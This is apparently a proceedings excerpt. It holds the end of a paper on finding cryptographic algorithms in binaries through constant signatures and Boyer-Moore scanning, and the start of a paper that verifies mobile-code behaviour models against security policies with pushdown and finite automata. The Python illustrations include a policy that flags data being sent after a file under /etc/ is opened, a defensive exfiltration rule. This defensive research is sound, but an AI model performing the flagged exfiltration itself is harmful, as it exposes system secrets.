    0xCE6767A9, 0x562B2B7D, 0xE7FEFE19, 0xB5D7D762, 0x4DABABE6,
    ……
}; // S box of AES

The S box is used as a characteristic word for scanning and checking a target file. If the S box defined by the AES grouping cryptographic algorithm matches some data in the file, the target file probably contains the AES algorithm. For instance, the S box appears in the code section shown in Figure 4, so the conjecture is reasonable.

10004170 DATA 00 00 00 00 00 00 00 00 A5 63 63 C6 84 7C 7C F8
10004180 DATA 99 77 77 EE 8D 7B 7B F6 0D F2 F2 FF BD 6B 6B D6
10004190 DATA B1 6F 6F DE 54 C5 C5 91 50 30 30 60 03 01 01 02
100041A0 DATA A9 67 67 CE 7D 2B 2B 56 19 FE FE E7 62 D7 D7 B5
100041B0 DATA E6 AB AB 4D 9A 76 76 EC 45 CA CA 8F 9D 82 82 1F
Fig. 4. The target code section including the S box of the AES algorithm
After disassembling the target code and analyzing the result, the AES grouping cryptographic algorithm is confirmed to be contained. To improve matching efficiency it is not necessary to use the whole S box as the characteristic-code when constructing the static characteristic-code database; provided accuracy is not affected, a part of the S box is enough. The static characteristic-code database of grouping cryptographic algorithms, which contains the codes of DES, AES, RC5 and RC6, can be constructed by a large amount of statistical analysis.
3.3 The Characteristic-Code of Public Key Cryptographic Algorithms
A public key cipher is described by a trap-door one-way function. A function f is a one-way function if, for any x in the domain of f, f(x) is easy to compute, while for any y in the range of f, f⁻¹(y) cannot be obtained even though f is known. If f⁻¹(y) can be computed once some auxiliary information (the trap-door information) is given, then f is a trap-door one-way function. The public key mechanism is designed on this principle, and the auxiliary (trap-door) information is the key. The security of this kind of cipher relies on its computational complexity in practice. Currently there are two categories of popular public key mechanisms: one is based on factoring large integers, of which the typical one is RSA; the other is based on the discrete logarithm, for example the ElGamal public key mechanism and the elliptic curve public key mechanism. Public key mechanisms have many static characteristics [8]. RSA relies on large integer factoring, so many large prime numbers appear in its implementation. The characteristic of large prime numbers in target code is introduced with RSA as the example. The code that generates large primes usually contains a table of small primes, so the small primes appear in the data section as magic numbers, as shown in Figure 5.

17 00 00 00 1D 00 00 00 1F 00 00 00 25 00 00 00
29 00 00 00 2B 00 00 00 2F 00 00 00 35 00 00 00
3B 00 00 00 3D 00 00 00 43 00 00 00 47 00 00 00
49 00 00 00 4F 00 00 00 53 00 00 00 59 00 00 00
61 00 00 00 65 00 00 00 67 00 00 00 6B 00 00 00
Fig. 5. Example of small prime numbers appearing in the data section (32-bit little-endian words: 0x17, 0x1D, 0x1F, …, 0x6B are the primes 23, 29, 31, …, 107)
Generally, the bit size of a multi-precision integer must be found as quickly as possible, so a 256-byte lookup table is used to save the time of checking each bit of a byte. The lookup table and the small-prime-table code segment can therefore be regarded as the static characteristic-code marking a public key cryptographic algorithm. By a large amount of statistical analysis, the static characteristic-code database of public key cryptographic algorithms, containing RSA, DSA, ElGamal, etc., is constructed.
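The three kinds of characteristic-code described in Sections 3.1 to 3.3 (initial link values scattered as instruction immediates, a contiguous S box, a small-prime table) can be combined into one small scanner. The following Python is an added illustration and not the authors' tool: its signature database, the sample "binary" it scans (assembled from the bytes shown in Figures 3, 4 and 5 plus constructed filler bytes) and all function names are assumptions of this example. It shows the point of Section 3.1 that the constants must be stored in the database in the byte order the target architecture uses, and that link values must be searched for one at a time while table-like constants are matched as one contiguous prefix.

```python
import struct


def le32(values):
    """Encode 32-bit constants the way an x86 binary stores them (little-endian)."""
    return b"".join(struct.pack("<I", v) for v in values)


SHA256_IV = [0x6A09E667, 0xBB67AE85, 0x3C6EF372, 0xA54FF53A,
             0x510E527F, 0x9B05688C, 0x1F83D9AB, 0x5BE0CD19]
MD5_IV = [0x67452301, 0xEFCDAB89, 0x98BADCFE, 0x10325476]
AES_SBOX0_PREFIX = [0xC66363A5, 0xF87C7C84, 0xEE777799, 0xF67B7B8D]
SMALL_PRIMES = [23, 29, 31, 37, 41, 43, 47, 53, 59, 61,
                67, 71, 73, 79, 83, 89, 97, 101, 103, 107]

# Each signature is a list of byte patterns that must ALL occur somewhere in the
# file.  Initial link values are usually scattered as immediates inside separate
# mov instructions (Fig. 3), so every value is its own pattern; table-like
# constants (S box, prime table) are contiguous, so a prefix is one pattern.
SIGNATURES = {
    "SHA256": [le32([v]) for v in SHA256_IV],
    "MD5": [le32([v]) for v in MD5_IV],
    "AES": [le32(AES_SBOX0_PREFIX)],
    "PRIME_TABLE": [le32(SMALL_PRIMES[:8])],
}


def scan(data: bytes) -> dict:
    """Return {name: lowest offset among the signature's patterns} for every
    signature whose patterns are all present in data."""
    hits = {}
    for name, patterns in SIGNATURES.items():
        offsets = [data.find(p) for p in patterns]
        if all(o >= 0 for o in offsets):
            hits[name] = min(offsets)
    return hits


# Constructed sample binary: the SHA-256 initialisation code of Fig. 3, the first
# rows of the AES table of Fig. 4 and a little-endian prime table as in Fig. 5,
# separated by filler bytes (offsets 16, 91 and 127).
SHA256_INIT_CODE = bytes.fromhex(
    "8B442404" "83602000" "83602400"
    "C70067E6096A" "C7400485AE67BB" "C7400872F36E3C" "C7400C3AF54FA5"
    "C740107F520E51" "C740148C68059B" "C74018ABD9831F" "C7401C19CDE05B")
AES_TABLE_BYTES = bytes.fromhex(
    "A56363C6847C7CF8997777EE8D7B7BF60DF2F2FFBD6B6BD6B16F6FDE54C5C591")
SAMPLE_BINARY = (b"\x00" * 16 + SHA256_INIT_CODE + b"\xcc" * 8
                 + AES_TABLE_BYTES + b"\x90" * 4 + le32(SMALL_PRIMES))


def big_endian_decoy() -> bytes:
    """The same SHA-256 constants in big-endian order: what a scanner that
    ignores byte order would look for, and what an x86 image does not contain."""
    return b"".join(struct.pack(">I", v) for v in SHA256_IV)


if __name__ == "__main__":
    for name, off in sorted(scan(SAMPLE_BINARY).items(), key=lambda kv: kv[1]):
        print(f"{name}: offset {off:08X}")
```

Running the block reports SHA256 at offset 0x1E (the immediate of the first mov in Fig. 3), AES at 0x5B and the prime table at 0x7F; MD5 is absent, and the big-endian decoy matches nothing, which is the false-negative mode a scanner built without regard to byte order would suffer.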
4 The Matching Algorithm of Cryptographic Algorithm Recognition
The quality of the matching algorithm directly affects the recognition efficiency. In a common matching algorithm the shifting process after a mismatch does not take full advantage of the candidate shift available at each step during execution. Suppose that the length of the target string is n and the length of the pattern string is m; then the time complexity is O(nm+1). The Boyer-Moore algorithm [9] introduces two functions, F(x) and G(x), in order to make full use of the shift. F(x) is the table giving the location at which each letter of the alphabet of the pattern string x is met when counting from the right; G(x) is also a table, giving the position where each possible suffix of x appears a second time, counting from the right. The implementation of the Boyer-Moore algorithm is shown in Figure 6.

Begin
  initialize A, x, text, n ← Length[text], m ← Length[x]
  F(x) ← Last-Occurrence Function
  G(x) ← Good-Suffix Function
  s ← 0;
  while s ≤ n − m do
    j ← m;
    while j > 0 and x[j] = text[s+j] do
      j ← j − 1;
    if j = 0 then
      Output the Location;
      s ← s + G(0);
    else
      s ← s + max[G(j), j − F(text[s+j])];
  return
end
Fig. 6. Boyer-Moore algorithm
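The algorithm of Figure 6 in runnable form, as an added example that is not the authors' implementation: last_occurrence is F(x), good_suffix is G(x) computed by the strong good-suffix rule, and the search returns every match together with the number of alignments it examined, so the saving over the naive method, which examines every alignment, is visible on the constructed input (a 4-byte little-endian constant after 64 bytes of filler). Offsets are 0-based here, whereas Figure 6 counts from 1; the function names and the sample input are assumptions of this example.

```python
from typing import Dict, List, Tuple


def last_occurrence(pattern: bytes) -> Dict[int, int]:
    """F(x): rightmost index of every byte value occurring in the pattern."""
    return {b: i for i, b in enumerate(pattern)}


def good_suffix(pattern: bytes) -> List[int]:
    """G(x): shift[j] is the safe shift after the suffix pattern[j:] matched and
    the byte before it mismatched (shift[0] is the shift after a full match)."""
    m = len(pattern)
    shift, border = [0] * (m + 1), [0] * (m + 1)
    i, j = m, m + 1
    border[i] = j
    while i > 0:                       # case 1: the suffix occurs again in the pattern
        while j <= m and pattern[i - 1] != pattern[j - 1]:
            if shift[j] == 0:
                shift[j] = j - i
            j = border[j]
        i, j = i - 1, j - 1
        border[i] = j
    j = border[0]
    for i in range(m + 1):             # case 2: a prefix of the pattern matches part of the suffix
        if shift[i] == 0:
            shift[i] = j
        if i == j:
            j = border[j]
    return shift


def boyer_moore(text: bytes, pattern: bytes) -> Tuple[List[int], int]:
    """Return (all match offsets, number of alignments examined)."""
    n, m = len(text), len(pattern)
    if m == 0 or m > n:
        return [], 0
    F, G = last_occurrence(pattern), good_suffix(pattern)
    matches, s, alignments = [], 0, 0
    while s <= n - m:
        alignments += 1
        j = m - 1
        while j >= 0 and pattern[j] == text[s + j]:   # compare right to left
            j -= 1
        if j < 0:
            matches.append(s)
            s += G[0]
        else:                                          # max of the two shift rules
            s += max(G[j + 1], j - F.get(text[s + j], -1))
    return matches, alignments


def naive_alignments(text: bytes, pattern: bytes) -> int:
    """Alignments a left-to-right scan without shift tables would examine."""
    return len(text) - len(pattern) + 1


# Constructed input: the first SHA-256 link value 0x6A09E667 in little-endian
# order, preceded by 64 zero bytes and followed by 8 zero bytes of filler.
PATTERN = bytes.fromhex("67E6096A")
SAMPLE_TEXT = b"\x00" * 64 + PATTERN + b"\x00" * 8

if __name__ == "__main__":
    found, checked = boyer_moore(SAMPLE_TEXT, PATTERN)
    print(f"matches at {found}, {checked} alignments examined "
          f"(naive: {naive_alignments(SAMPLE_TEXT, PATTERN)})")
```

On the sample the filler byte never occurs in the pattern, so F returns −1 for it and every mismatch shifts by the full pattern length: 19 alignments are examined instead of 73.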
5 Test and Conclusion
In order to verify the speed and reliability of recognizing the characteristic-code and to analyze common applications, the test platform was Windows XP on a Pentium 4 at 2.8 GHz with 512 MB of memory. The result is shown in Table 1.

Table 1. The scanning result of cryptographic algorithm characteristic-code

No. | Scanned file name | File size (B) | Scanning time (s) | Displacement address of characteristic words in the file
1 | Adobe Acrobat Acrobat.dll | 11,866,112 | 4.719 | MD5:0060AA4D, SHA1:001A754F, SHA512:005EF891, SHA384:005EF733, AES:0087B900, RC2:0087B9A0, BASE64:007534F8, MD2:0087A1E0
2 | MS Office Exchcsp.dll | 247,296 | 0.125 | MD5:000304F6, SHA1:00005394, DES:00009550, RC2:00009410, BASE64:000019B8, MD2:00038F50
3 | MS Office Word.exe | 12,037,688 | 4.797 | MD5_UNICODE:00104726, SHA1_UNICODE:00104726, TEA:002C3841
4 | WinRAR 3.02 Unacev2.dll | 75,264 | 0.047 | SHA1:0000A60A, Blowfish:000099F2
5 | UltraEdit-32 SftpDLL.dll | 565,248 | 0.281 | Blowfish:00060FE8, CAST:00065C0C, DES:000647C8, SHA1:00020128, MD2:0007390C, MD5:00020194, RC2:00073D1C, AES:0005C320, RIPEMD:00027B79
6 | Winzip Pro WZEAY32.dll | 856,064 | 0.328 | SHA1:00003C28, CAST:0008C6F0, DES:0008A9D0, MD5:00003C8A, RC2:000B9360, AES:0008CB19

Suppose that the size of file i is gᵢ and its scanning time is tᵢ; the average speed is η = Σgᵢ / Σtᵢ = 2.49 MB/s. The largest file in the test data is 12.037 MB and took 4.797 s.
The result shows that this scanning tool can quickly find the common cryptographic algorithm information in target code; the speed decreases as the characteristic-code database grows, but the scanning time increases only linearly, which does not affect its practicability. The probability of conflict between characteristic words is very small, so the result has high reliability.
6 Future Works
The reliability of the method proposed in this paper, cryptographic algorithm recognition based on characteristic-code checking, depends mainly on the static characteristic database of cryptographic algorithms, so it has definite limitations. However, in communication and in software encryption and decryption, security relies on the security of the cryptographic algorithm itself, so users adopt the standard cryptographic libraries, and because modifications of the cryptographic algorithm itself are limited, this method has considerable reliability. Essentially, algorithm recognition needs to determine the semantic actions performed by a section of code, and deciding whether two such pieces of code are equivalent has been proved to be an NP-complete problem; in theory, algorithm recognition should continue to study the functional description of algorithm semantics and the target information extracted by reverse analysis. Technologies such as abstract algorithm description, dataflow analysis and expression restoration can be applied in this field.
References
1. Alias, C.: Program Optimization by Template Recognition and Replacement. University of Versailles Saint-Quentin (2005)
2. Metzger, R.: Automatic Algorithm Recognition and Replacement. MIT, Cambridge (2003)
3. Li, J.-z., Jiang, L.-h., Yin, Q.: Cryptogram Algorithm Recognition Technology Based on Bayes Decision-making. Computer Engineering 34(20), 159–163 (2008)
4. Jin, Q., Wu, G.-x., Li, D.: Research of anti-virus engine and automatic extraction of computer virus signatures. Computer Engineering and Design 28(24) (2007)
5. Chen, H.-w., Liu, C.-l.: Principle of Compiling. National Defense Industry Press, Beijing (2000)
6. Cifuentes, C.: Reverse Compilation Techniques. Queensland University (1994)
7. Wu, S.-z., Zhu, S.-x.: Applied Cryptography. China Machine Press, Beijing (2000)
8. Harvey, I.: Cipher Hunting: How To Find Cryptographic Algorithms In Large Binaries. nCipher Corporation Ltd. (2001)
9. Li, H.-d., Yao, T.-x.: Pattern Classification. China Machine Press, Beijing (2003)
Verification of Security-Relevant Behavior Model and Security Policy for Model-Carrying Code Yonglong Wei, Xiaojuan Zheng, Jinglei Ren, Xudong Zheng, Chen Sun, and Zhenhao Li School of Software, Northeast Normal University, Changchun, China [email protected], [email protected], {jinglei.ren, dong128, bbsunchen, zhenhaolee}@gmail.com
Abstract. This article presents a method of verifying the safety of untrusted mobile code using a model of the security-relevant behaviors of the code. The method verifies whether the model violates the user's security policy, to help users decide which programs to run and which not, and hence ensures the security of users' systems and devices. Based on the framework of model-carrying code, we make several improvements: using the extended pushdown automaton (EPDA) as the program behavior model, reducing ambiguity in regular expressions over events (REE), and proposing a new verification algorithm according to the above improvements. Keywords: mobile code security, verification, behavior model, security policy, model-carrying code.
1 Introduction
With the rapid growth in the use of the Internet and wireless networks, malware such as viruses, Trojan horses, worms and spyware spreads widely hidden in mobile code and has become a dire threat to users' information security. To meet the challenge of mobile code security, R. Sekar et al. proposed the security framework of model-carrying code (MCC) [1]. In spite of the many advantages of the MCC method over traditional ones, there are still problems, among which the most significant are the limited precision of the program behavior model and the ambiguity in expressing security policies. To overcome these problems and make the MCC method more practical, we make the following improvements to it: (1) We use the extended pushdown automaton (EPDA) to model security-relevant program behaviors. This new model features extended attributes, including a call stack and state variables, which make the PDA more precise, so that one sort of impossible path is eliminated and many mimicry attacks [7] can be detected. (2) We define the extended finite state automaton (EFSA) to model the security policy and use standard greedy quantifiers for regular expressions over events (REE) [4], by which much of the ambiguity in policy expression is eliminated. (3) We provide a new algorithm for verification of the EPDA-based program behavior model against the EFSA-based security policy. In order to make the MCC framework more applicable to wireless networks and mobile code, we have also implemented a prototype system on Java Platform Micro Edition (Java ME). The organization of this paper is as follows: related work is introduced in Section 2; formal definitions of the program behavior model and the security policy are given in Sections 3 and 4 respectively; in Section 5 the procedure of the verification algorithm is given, including an analysis of its complexity and a proof of equivalence between the defined automata; Section 6 is the conclusion.
This work was supported by the key project of Science and Technology Planning of Jilin, P.R.China (20080323) and National Collegiate Innovative Experiment Program.
D. Ślęzak et al. (Eds.): SecTech 2009, CCIS 58, pp. 148–156, 2009. © Springer-Verlag Berlin Heidelberg 2009
2 Related Work
Researchers have proposed many approaches to ensure the secure execution of untrusted code, mostly based on static analysis or runtime monitoring. Prevalent methods include the sandbox [5], code signatures [5,6], proof-carrying code [3] and the Java security model [9]. An important common problem with these methods is that they fail to consider the gap between code producers and consumers. Code producers are unable to foresee the safety requirements of code consumers; conversely, code consumers cannot determine in advance the proper limits on a program's access to local resources, since the security policy largely depends on the program's function. R. Sekar et al. proposed the model-carrying code method [1], providing an ideal safety framework for mobile code execution. The method originates from the domain of intrusion detection. Nevertheless, R. Sekar's MCC still has defects in several aspects: (1) it uses an EFSA as the program behavior model, which cannot capture a program's function call and return behavior and therefore allows impossible paths and the possibility of mimicry and evasion attacks [7]; (2) the expression of the security policy using REE is ambiguous and imprecise, which may lead to extra false matches when compared against operation sequences and affects the performance of verification.
3 Security-Relevant Behavior Model: EPDA
We employ a new way to identify relations between calls to the same function that are triggered at different points of the program. The automaton pushes a specific symbol to the call stack when the function is called at some point and then pops the symbol when function returns to determine the next state the program reaches after the call. Specifically, we use the EPDA as the model of security-relevant behaviors of code, which is formally defined as follows:
Definition 3.1. M = (Q, Σ, Γ, δ, q0, z, F, n, m, S, A, β0, con, ass), where
Q is a finite set of internal states,
Σ is the finite set of function names of system calls,
Γ is a finite set of symbols called the stack alphabet,
δ: Q × (Σ ∪ λ) ×  Γ → finite subsets of Q × Γ* is the transition function,
q0 ∈ Q is the initial state,
z ∈ Γ is the stack start symbol,
F ⊆ Q is the set of final states,
n is the maximal number of arguments of system calls,
m is the number of state variables,
S is the alphabet of a first-order language without universal and existential quantifiers whose variable symbols are v1, v2 ... vm, p1, p2 ... pn,
A is an S-structure,
β0 is the initial assignment in A, a map {v1, v2 ... vm} → |A|,
con: Q × (Σ ∪ λ) × Γ × Q × Γ* → the set of S-formulas is a function that maps each state transition to a condition,
ass: (the set of functions {v1, v2 ... vm} → |A|) × Q × (Σ ∪ λ) × Γ × Q × Γ* × |A|ⁿ → (the set of functions {v1, v2 ... vm} → |A|).
Let I = (Σ ∪ {λ}) × |A|ⁿ be the input alphabet. The tuple (q, w, u, β), where q is the current state, w is the unread part of the input string, u is the stack contents and β is a map {v1, v2 ... vm} → |A|, is called an instantaneous description of an EPDA. A move from one instantaneous description to another is denoted by the symbol ⊢. (q1, aw, bx, β1) ⊢ (q2, w, yx, β2) is possible if and only if
1. (q2, y) ∈ δ(q1, a(1), b), and
2. A ⊨ con(q1, a(1), b, q2, y)[β1 ∪ θ], where θ is the function {p1, p2 ... pn} → |A|ⁿ such that θ(pi) = a(i + 1), and
3. β2 = ass(β1, q1, a(1), b, q2, y, a(2), a(3) ... a(n + 1)).
Since EPDA-based behavior models carry additional information about function calls and returns, they are more precise than EFSA-based ones and admit fewer impossible paths, at the cost of higher complexity.
4 Security Policy: EFSA
Much as in traditional MCC, the security policy is expressed by an EFSA, but we redefine the EFSA as the following tuple so that it can be used in the formal proof and the algorithm description in Section 5:
Definition 4.1. The EFSA is defined by the tuple M = (Q, Σ, δ, q0, F, n, m, S, A, β0, con, ass), where
Q is a finite set of internal states,
Σ is the finite set of function names of system calls,
δ: Q × (Σ ∪ λ) → finite subsets of Q is the transition function,
q0 ∈ Q is the initial state,
F ⊆ Q is the set of final states,
n is the maximal number of arguments of system calls,
m is the number of state variables,
S is the alphabet of a first-order language without universal and existential quantifiers whose variable symbols are v1, v2 ... vm, p1, p2 ... pn,
A is an S-structure,
β0 is the initial assignment in A, a map {v1, v2 ... vm} → |A|,
con is a computable function Q × (Σ ∪ λ) × Q → the set of S-formulas that maps each state transition to a condition,
ass is a computable function (the set of functions {v1, v2 ... vm} → |A|) × Q × (Σ ∪ λ) × Q × |A|ⁿ → (the set of functions {v1, v2 ... vm} → |A|). If ass(β, q1, a, q2, π1 ... πn) = β, then ass is called the trivial assignment.
Let I = (Σ ∪ {λ}) × |A|ⁿ be the input alphabet. The tuple (q, w, β), where q is the current state, w is the unread part of the input sequence and β is a map {v1, v2 ... vm} → |A|, is called an instantaneous description of an EFSA. A move from one instantaneous description to another is denoted by the symbol ⊢. (q1, aw, β1) ⊢ (q2, w, β2) is possible if and only if
1. q2 ∈ δ(q1, a(1)), and
2. A ⊨ con(q1, a(1), q2)[β1 ∪ θ], where θ is the function {p1, p2 ... pn} → |A|ⁿ such that θ(pi) = a(i + 1), and
3. β2 = ass(β1, q1, a(1), q2, a(2), a(3) ... a(n + 1)).
Moves involving an arbitrary number of steps are denoted by ⊢*. Where several automata are under consideration we write ⊢M to emphasize that the move is made by the particular automaton M.
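The move relations of Definitions 3.1 and 4.1 in executable form, as an added illustration that is not the authors' implementation: the runner below explores the instantaneous descriptions (q, unread input, stack, β) of an EPDA, and an EFSA is run as the special case whose stack alphabet is {z} and whose stack is never changed, so one runner checks both a behavior model and a policy against an operation sequence. The conditions con and assignments ass are plain Python callables on the state-variable assignment and the call arguments rather than S-formulas interpreted in a structure A; the behavior model (a helper f() called from two sites A and B) and the policy (no send after a file under /etc/ was opened) are constructed for the example, and all names are assumptions.

```python
from dataclasses import dataclass, field
from typing import Callable, Dict, FrozenSet, List, Tuple

Event = Tuple[str, tuple]   # (system-call name a(1), its arguments a(2) .. a(n+1))
Beta = Dict[str, object]    # assignment of the state variables v1 .. vm
LAMBDA = ""                 # a lambda move consumes no input symbol


@dataclass
class Transition:
    src: str                 # q1
    sym: str                 # a(1): an element of Sigma, or LAMBDA
    top: str                 # stack symbol b that must be on top
    dst: str                 # q2
    push: str                # string y written in place of b ("" pops b)
    con: Callable[[Beta, tuple], bool] = lambda beta, args: True   # condition 2
    ass: Callable[[Beta, tuple], Beta] = lambda beta, args: beta   # condition 3


@dataclass
class EPDA:
    transitions: List[Transition]
    q0: str
    z: str                   # stack start symbol
    finals: FrozenSet[str]
    beta0: Beta = field(default_factory=dict)

    def accepts(self, events: List[Event], max_steps: int = 10_000) -> bool:
        """Explore the instantaneous descriptions (q, unread input, stack, beta)
        reachable through the move relation; accept on a final state once all
        input is read.  The stack is a string whose first character is the top."""
        start = (self.q0, 0, self.z, frozenset(self.beta0.items()))
        todo, seen, steps = [start], {start}, 0
        while todo and steps < max_steps:
            q, i, stack, frozen_beta = todo.pop()
            steps += 1
            if i == len(events) and q in self.finals:
                return True
            beta = dict(frozen_beta)
            for t in self.transitions:
                if t.src != q or not stack or stack[0] != t.top:
                    continue                     # condition 1: (q2, y) in delta(q1, a(1), b)
                if t.sym == LAMBDA:
                    nxt, args = i, ()
                elif i < len(events) and events[i][0] == t.sym:
                    nxt, args = i + 1, events[i][1]
                else:
                    continue
                if not t.con(beta, args):        # condition 2: A |= con(...)[beta1 u theta]
                    continue
                beta2 = t.ass(dict(beta), args)  # condition 3: beta2 = ass(beta1, ...)
                nid = (t.dst, nxt, t.push + stack[1:], frozenset(beta2.items()))
                if nid not in seen:
                    seen.add(nid)
                    todo.append(nid)
        return False


def behavior_model(with_stack: bool) -> EPDA:
    """Constructed model of a program whose main() calls the helper f() from two
    sites A and B, and f() issues exactly one read.  With the call stack, the
    return from f() continues at the site that called it; without it (the
    EFSA-style model) a return may continue at either site."""
    z = "z"
    if with_stack:
        ts = [Transition("q0", LAMBDA, z, "f", "A" + z),       # call from site A: push A
              Transition("f", "read", "A", "f_done", "A"),
              Transition("f_done", LAMBDA, "A", "q1", ""),     # return: pop A, back to site A
              Transition("q1", LAMBDA, z, "f", "B" + z),       # call from site B: push B
              Transition("f", "read", "B", "f_done", "B"),
              Transition("f_done", LAMBDA, "B", "q2", "")]     # return: pop B, back to site B
    else:
        ts = [Transition("q0", LAMBDA, z, "f", z),
              Transition("f", "read", z, "f_done", z),
              Transition("f_done", LAMBDA, z, "q1", z),        # impossible path: a return
              Transition("f_done", LAMBDA, z, "q2", z),        # may continue at either site
              Transition("q1", LAMBDA, z, "f", z)]
    ts.append(Transition("q2", "send", z, "q3", z))
    return EPDA(ts, "q0", z, frozenset({"q3"}))


SYSCALLS = ("open", "read", "send", "close")


def policy() -> EPDA:
    """Constructed EFSA policy (stack alphabet {z}, never changed): the final
    state 'violation' is reached when data is sent after a file under /etc/
    was opened; the state variable v1 records that file name."""
    z = "z"
    def sensitive(beta, args):
        return bool(args) and str(args[0]).startswith("/etc/")
    def remember(beta, args):
        beta["v1"] = args[0]
        return beta
    ts = [Transition("p0", "open", z, "p1", z, con=sensitive, ass=remember),
          Transition("p0", "open", z, "p0", z, con=lambda b, a: not sensitive(b, a)),
          Transition("p1", "send", z, "violation", z)]
    ts += [Transition("p0", s, z, "p0", z) for s in SYSCALLS if s != "open"]
    ts += [Transition("p1", s, z, "p1", z) for s in SYSCALLS if s != "send"]
    ts += [Transition("violation", s, z, "violation", z) for s in SYSCALLS]
    return EPDA(ts, "p0", z, frozenset({"violation"}), {"v1": None})
```

The sequence read, send (one call of f() followed by the send) is accepted by the stack-less model because the return from f() may jump to the second call site, but rejected by the EPDA, whose stack forces the return to site A and then a second call with its own read; this is the impossible path the call stack eliminates. The policy automaton accepts exactly the forbidden sequences, so acceptance means a violation.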
5 Formal Verification of EPDA and EFSA

5.1 Finding an Equivalent EFSA for an EPDA
Behavior models of code are based on EPDA while security policies are based on EFSA. To verify whether a model satisfies a policy, we need to build the product automaton of the EPDA and the EFSA, which requires finding an EFSA equivalent to the EPDA. The proof of their equivalence is given below.

Definition 5.1. The language accepted by an EPDA $M$ is the set $L(M) = \{w \in I^* : (q_0, w, z, \beta_0) \vdash^*_M (p, \lambda, u, \beta),\ p \in F,\ \beta \text{ a map } \{v_1, \dots, v_m\} \to |A|\}$.
Y. Wei et al.
Definition 5.2. The language accepted by an EFSA $M$ is the set $L(M) = \{w \in I^* : (q_0, w, \beta_0) \vdash^*_M (p, \lambda, \beta),\ p \in F,\ \beta \text{ a map } \{v_1, \dots, v_m\} \to |A|\}$.

Theorem 5.1. For any EPDA $M$ there is an EFSA $M'$ such that $L(M) = L(M')$.

Proof. Suppose $M = (Q, \Sigma, \Gamma, \delta, q_0, z, F, n, m, S, A, \beta_0, con, ass)$. Construct $M' = (Q', \Sigma', \delta', q_0', F', n', m', S', A', \beta_0', con', ass')$ as follows:
- $Q' = Q \times \Gamma \times (\mathrm{range}(\delta) \cup \{z\})$; a state of $M'$ records the state of $M$, the symbol on top of the stack, and the string most recently pushed;
- $\Sigma' = \Sigma$;
- $\delta' : Q' \times (\Sigma \cup \{\lambda\}) \to$ finite subsets of $Q'$, with $q_2' \in \delta'(q_1', a)$ if and only if $(q_2'(1), q_2'(3)) \in \delta(q_1'(1), a, q_1'(2))$;
- $q_0' = (q_0, z, z)$;
- $F' = \{q' \in Q' : q'(1) \in F\}$;
- $n' = n$, $m' = m$;
- $S' = S \cup \{St, link, top\}$, where $St$ is a variable symbol, $link$ a binary function symbol and $top$ a unary function symbol;
- $A'$ is an extension of $A$ such that $|A'| = |A| \cup \Gamma^*$ and, for $aw, v \in \Gamma^*$, $top^{A'}(aw) = a$ and $link^{A'}(aw, v) = vw$;
- $\beta_0' = \beta_0 \cup \{(St, z)\}$;
- $con'(q_1', a, q_2') = con(q_1'(1), a, q_1'(2), q_2'(1), q_2'(3)) \wedge top(St) = q_1'(2) \wedge top(link(St, q_2'(3))) = q_2'(2)$;
- $ass'$ : (the set of functions of the form $(\{v_1, \dots, v_m\} \to |A|) \cup \{(St, w)\}$, $w \in \Gamma^*$) $\times\, Q' \times (\Sigma \cup \{\lambda\}) \times Q' \times |A|^n \to$ (the set of functions of the same form), such that $ass'(\beta \cup \{(St, w)\}, q_1', a, q_2', t) = ass(\beta, q_1'(1), a, q_1'(2), q_2'(1), q_2'(3), t) \cup \{(St, link(w, q_2'(3)))\}$ for $t \in |A|^n$.

In other words, $St$ holds the whole stack as a string and $link$ pushes onto it, so the construction does not remove the stack but carries it in a state variable ranging over $\Gamma^*$.

We now only need to prove that for any $w \in I^*$ we have $(q_0, w, z, \beta_0) \vdash^k_M (p, \lambda, u, \beta)$ for some $p \in F$ if and only if $(q_0', w, \beta_0') \vdash^k_{M'} (p', \lambda, \beta')$ for some $p' \in F'$. The proof is by induction on $k$.
1. Base case. For the initial instantaneous description $(q_0, w, z, \beta_0)$ of $M$, $M'$ has the initial instantaneous description $((q_0, z, t), w, \beta_0 \cup \{(St, z)\})$ for some $t \in \Gamma^*$.
2. Induction step. $(q_1, ax, by, \beta_1) \vdash_M (q_2, x, vy, \beta_2)$ if and only if $(q_2, v) \in \delta(q_1, a(1), b)$, $A \models con(q_1, a(1), b, q_2, v)[\beta_1 \cup \theta]$ where $\theta$ is the function $\{p_1, \dots, p_n\} \to |A|$ with $\theta(p_i) = a(i+1)$, and $\beta_2 = ass(\beta_1, q_1, a(1), b, q_2, v, a(2), a(3), \dots, a(n+1))$; if and only if $(q_2, v) \in \delta(q_1, a(1), b)$, $A' \models con(q_1, a(1), b, q_2, v) \wedge top(St) = b \wedge top(link(St, v)) = top(vy)\ [\beta_1 \cup \theta \cup \{(St, by)\}]$ with the same $\theta$, and $\beta_2 \cup \{(St, vy)\} = ass(\beta_1, q_1, a(1), b, q_2, v, a(2), a(3), \dots, a(n+1)) \cup \{(St, link(by, v))\} = ass(\beta_1, q_1, a(1), b, q_2, v, a(2), a(3), \dots, a(n+1)) \cup \{(St, link(\beta(St), v))\}$ where $\beta = \beta_1 \cup \{(St, by)\}$; and, by the construction of $M'$, if and only if $((q_1, b, t), ax, \beta_1 \cup \{(St, by)\}) \vdash_{M'} ((q_2, top(vy), v), x, \beta_2 \cup \{(St, vy)\})$ for some $t \in \Gamma^*$.

We have thus proved that $(q_0, w, z, \beta_0) \vdash^k_M (p, x, u, \beta)$ if and only if $(q_0', w, \beta_0') \vdash^k_{M'} ((p, top(u), t), x, \beta \cup \{(St, u)\})$ for some $t \in \Gamma^*$, for all $k \in \mathbb{N}$. Further, $(q_0, w, z, \beta_0) \vdash^k_M (p, \lambda, u, \beta)$ for some $p \in F$ and $u \in \Gamma^*$ if and only if $(q_0', w, \beta_0') \vdash^k_{M'} ((p, top(u), t), \lambda, \beta \cup \{(St, u)\})$ for some $p \in F$, $t \in \Gamma^*$ and $u \in \Gamma^*$, if and only if $(q_0', w, \beta_0') \vdash^k_{M'} (p', \lambda, \beta')$ for some $p' \in F'$. End of proof.

The proof of Theorem 5.1 shows that an EPDA has no more descriptive power than an EFSA over the extended structure $A'$, and it also shows how to construct the equivalent EFSA for an EPDA. Note that the equivalence is obtained by moving the stack into the state variable $St$, whose domain $\Gamma^*$ is infinite; the path-exploration algorithm of Section 5.3 therefore still has to track stack contents explicitly.

5.2 Improvements to REE
